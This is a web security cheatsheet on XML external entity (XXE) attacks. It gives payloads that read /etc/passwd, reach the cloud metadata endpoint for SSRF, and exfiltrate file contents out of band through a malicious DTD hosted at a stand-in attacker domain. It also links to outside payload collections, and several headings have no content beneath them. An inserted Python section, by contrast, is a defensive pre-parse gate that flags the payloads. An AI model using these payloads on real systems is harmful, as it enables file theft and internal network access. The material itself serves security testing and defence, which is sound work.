XXE Cheatsheet

To retrieve a file

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

To perform SSRF

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

Cloud Cheatsheet for SSRF - https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf

To retrieve a file using blind (out-of-band) XXE

  1. Host a malicious external DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
  2. Call the malicious external DTD using XML parameter entities

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

To retrieve a file using error-based XXE

Scenario 1 -

  1. Host the DTD below

  2. Call the DTD

Scenario 2 - (causing an error by loading a local DTD)

XInclude

In some scenarios we may not control the entire document (the DOCTYPE cannot be modified), only part of it.

In those cases you can use XInclude to retrieve files or perform SSRF.
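All of the techniques above depend on constructs a parser for untrusted input has no reason to honour: a DOCTYPE, external general or parameter entities, and XInclude elements. The following added example (not part of the original cheatsheet) is a pre-parse gate built on Python's stdlib expat bindings; it records those constructs without resolving anything, so the document can be rejected before it reaches the real parser. The sample documents are constructed from this page's payloads, wrapped in a root element.

```python
# Pre-parse gate for untrusted XML: observes DOCTYPE, entity declarations and
# XInclude elements without resolving them. Returns a list of findings; an empty
# list means none of the XXE/XInclude building blocks were present.
import xml.parsers.expat as expat

XINCLUDE_NS = {"http://www.w3.org/2001/XInclude", "http://www.w3.org/2003/XInclude"}


def audit_xml(data: bytes) -> list:
    findings = []
    p = expat.ParserCreate(namespace_separator=" ")
    # Never expand parameter entities (%xxe;); we only want to see declarations.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE {name}" + (f" SYSTEM {sysid}" if sysid else ""))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        if sysid:  # SYSTEM "file:///..." or "http://..." = file read / SSRF primitive
            findings.append(f"external {kind} entity {name} -> {sysid}")
        else:
            findings.append(f"internal {kind} entity {name}")

    def on_external_ref(context, base, sysid, pubid):
        findings.append(f"external entity reference -> {sysid}")
        return 1  # report as handled so expat continues; nothing is fetched

    def on_start(name, attrs):
        ns, _, local = name.rpartition(" ")
        if ns in XINCLUDE_NS and local == "include":
            findings.append(f"XInclude href={attrs.get('href')}")

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    p.StartElementHandler = on_start
    try:
        p.Parse(data, True)
    except expat.ExpatError as exc:
        findings.append(f"not well-formed: {exc}")
    return findings


# Constructed samples: the page's payloads wrapped in a root element, plus a clean document.
FILE_READ = b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>'
BLIND_DTD = b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]><foo/>'
XINCLUDE = b'<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="file:///etc/passwd"/></foo>'
CLEAN = b'<?xml version="1.0"?><order><item id="1">widget</item></order>'

if __name__ == "__main__":
    for label, doc in [("file-read", FILE_READ), ("blind", BLIND_DTD), ("xinclude", XINCLUDE), ("clean", CLEAN)]:
        print(label, audit_xml(doc) or "no findings")
```

A non-empty result is the signal to reject the input; this gate complements, rather than replaces, disabling DTD loading and XInclude in the parser that actually processes the document.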

XXE using SVG Upload

XSLT

XSLT stylesheets are themselves XML documents that define how to present and transform XML. If transforms are enabled, this can lead to XXE even when the DOCTYPE is disabled in some cases. [ManageEngine ServiceDesk CVE-2022-47966]

Payloads - https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/#remote-code-execution-with-java
